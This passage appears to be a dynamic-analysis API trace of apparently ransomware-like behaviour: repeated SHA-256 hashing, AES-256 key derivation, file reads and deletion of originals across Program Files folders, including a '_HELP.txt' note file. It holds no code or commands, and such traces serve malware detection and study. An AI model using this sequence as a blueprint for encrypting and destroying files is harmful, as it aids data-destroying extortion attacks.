[0154.441] CryptDestroyKey (hKey=0x284d528) returned 1 [0154.441] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0154.442] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\whitedot.png")) returned 0 [0154.443] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0154.443] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0154.443] CryptHashData (hHash=0x284d668, pbData=0x9e9668, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.443] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0154.444] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0154.444] ReadFile (in: hFile=0x454, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0154.445] CryptDestroyHash (hHash=0x284d668) returned 1 [0154.445] CryptDestroyKey (hKey=0x284d528) returned 1 [0154.445] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.446] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\_HELP.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\_help.txt")) returned 1 [0154.447] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0154.448] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0154.448] CryptHashData (hHash=0x284d628, pbData=0x9e9668, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.448] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0154.448] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x379f [0154.448] ReadFile (in: hFile=0x40c, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0154.452] CryptDestroyHash (hHash=0x284d628) returned 1 [0154.452] CryptDestroyKey (hKey=0x284d568) returned 1 [0154.452] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.453] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\Filters.xml" (normalized: "c:\\program files\\dvd maker\\shared\\filters.xml")) returned 0 [0154.454] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0154.456] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0154.457] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0154.457] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0154.457] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0154.479] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0154.591] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0154.592] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0154.638] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0154.638] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0154.685] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0154.872] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0155.647] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0155.669] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0155.757] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0155.826] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0155.827] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0155.827] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0155.827] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0155.827] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd0aa [0155.827] ReadFile (in: hFile=0x42c, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0155.932] CryptDestroyHash (hHash=0x284d528) returned 1 [0155.932] CryptDestroyKey (hKey=0x284d568) returned 1 [0155.932] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0155.933] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Adjacency.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\adjacency.thmx")) returned 1 [0155.935] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0155.935] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0155.935] CryptHashData (hHash=0x284d628, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0155.935] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0155.935] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11098 [0155.935] ReadFile (in: hFile=0x45c, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0155.967] CryptDestroyHash (hHash=0x284d628) returned 1 [0155.967] CryptDestroyKey (hKey=0x284d568) returned 1 [0155.967] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0155.969] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Angles.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\angles.thmx")) returned 1 [0155.971] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0155.972] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0155.972] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0155.972] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0155.972] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3f427 [0155.972] ReadFile (in: hFile=0x42c, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0156.254] CryptDestroyHash (hHash=0x284d528) returned 1 [0156.254] CryptDestroyKey (hKey=0x284d568) returned 1 [0156.254] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0156.256] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apex.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\apex.thmx")) returned 1 [0156.259] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0156.260] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0156.260] CryptHashData (hHash=0x284d628, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0156.260] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0156.260] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x15a56 [0156.260] ReadFile (in: hFile=0x45c, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0156.526] CryptDestroyHash (hHash=0x284d628) returned 1 [0156.526] CryptDestroyKey (hKey=0x284d568) returned 1 [0156.526] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0156.528] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apothecary.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\apothecary.thmx")) returned 1 [0156.592] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0156.593] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0156.593] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0156.593] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0156.593] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x109e5 [0156.593] ReadFile (in: hFile=0x42c, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0156.640] CryptDestroyHash (hHash=0x284d528) returned 1 [0156.640] CryptDestroyKey (hKey=0x284d568) returned 1 [0156.640] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0156.642] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Aspect.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\aspect.thmx")) returned 1 [0156.644] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0156.644] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0156.644] CryptHashData (hHash=0x284d628, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0156.644] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0156.644] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1763b [0156.644] ReadFile (in: hFile=0x45c, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0156.666] CryptDestroyHash (hHash=0x284d628) returned 1 [0156.666] CryptDestroyKey (hKey=0x284d568) returned 1 [0156.666] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0156.667] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Austin.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\austin.thmx")) returned 1 [0156.669] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0156.670] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0156.670] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0156.670] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0156.670] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9ff03 [0156.670] ReadFile (in: hFile=0x42c, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0156.784] CryptDestroyHash (hHash=0x284d528) returned 1 [0156.784] CryptDestroyKey (hKey=0x284d568) returned 1 [0156.784] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0156.787] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Black Tie.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\black tie.thmx")) returned 1 [0156.894] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0156.894] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0156.894] CryptHashData (hHash=0x284d628, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0156.894] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0156.895] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18c11 [0156.895] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0156.934] CryptDestroyHash (hHash=0x284d628) returned 1 [0156.934] CryptDestroyKey (hKey=0x284d568) returned 1 [0156.934] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0156.936] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Civic.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\civic.thmx")) returned 1 [0156.938] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0156.938] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0156.938] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0156.938] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0156.938] GetFileSize (in: hFile=0x498, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x105f4 [0156.939] ReadFile (in: hFile=0x498, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0156.965] CryptDestroyHash (hHash=0x284d528) returned 1 [0156.965] CryptDestroyKey (hKey=0x284d568) returned 1 [0156.965] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0156.966] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Clarity.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\clarity.thmx")) returned 1 [0156.968] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0156.969] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0156.969] CryptHashData (hHash=0x284d628, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0156.969] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0156.969] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8ad4d [0156.969] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0157.124] CryptDestroyHash (hHash=0x284d628) returned 1 [0157.124] CryptDestroyKey (hKey=0x284d568) returned 1 [0157.124] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0157.126] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Composite.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\composite.thmx")) returned 1 [0157.132] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0157.144] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0157.144] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0157.144] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0157.144] GetFileSize (in: hFile=0x498, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1240d [0157.144] ReadFile (in: hFile=0x498, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0157.301] CryptDestroyHash (hHash=0x284d528) returned 1 [0157.301] CryptDestroyKey (hKey=0x284d568) returned 1 [0157.301] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0157.303] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Concourse.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\concourse.thmx")) returned 1 [0157.357] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0157.358] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0157.358] CryptHashData (hHash=0x284d628, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0157.358] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0157.358] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1e92c4 [0157.358] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0157.607] CryptDestroyHash (hHash=0x284d628) returned 1 [0157.607] CryptDestroyKey (hKey=0x284d568) returned 1 [0157.607] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0157.609] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Couture.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\couture.thmx")) returned 1 [0157.649] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0157.649] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0157.649] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0157.649] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0157.649] GetFileSize (in: hFile=0x498, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x555df [0157.649] ReadFile (in: hFile=0x498, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0157.691] CryptDestroyHash (hHash=0x284d528) returned 1 [0157.691] CryptDestroyKey (hKey=0x284d568) returned 1 [0157.691] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0157.693] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Elemental.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\elemental.thmx")) returned 1 [0157.696] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0157.697] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0157.697] CryptHashData (hHash=0x284d628, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0157.697] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0157.697] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10f61 [0157.697] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0157.713] CryptDestroyHash (hHash=0x284d628) returned 1 [0157.713] CryptDestroyKey (hKey=0x284d568) returned 1 [0157.713] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0157.714] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Equity.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\equity.thmx")) returned 1 [0157.716] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0157.717] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0157.717] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0157.717] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0157.717] GetFileSize (in: hFile=0x498, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc278 [0157.717] ReadFile (in: hFile=0x498, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0157.737] CryptDestroyHash (hHash=0x284d528) returned 1 [0157.737] CryptDestroyKey (hKey=0x284d568) returned 1 [0157.737] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0157.738] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Essential.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\essential.thmx")) returned 1 [0157.739] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0157.740] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0157.740] CryptHashData (hHash=0x284d628, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0157.740] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0157.740] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd748 [0157.740] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0157.777] CryptDestroyHash (hHash=0x284d628) returned 1 [0157.777] CryptDestroyKey (hKey=0x284d568) returned 1 [0157.777] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0157.778] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Executive.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\executive.thmx")) returned 1 [0157.820] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0157.821] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0157.821] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0157.821] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0157.821] GetFileSize (in: hFile=0x498, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x100a8 [0157.821] ReadFile (in: 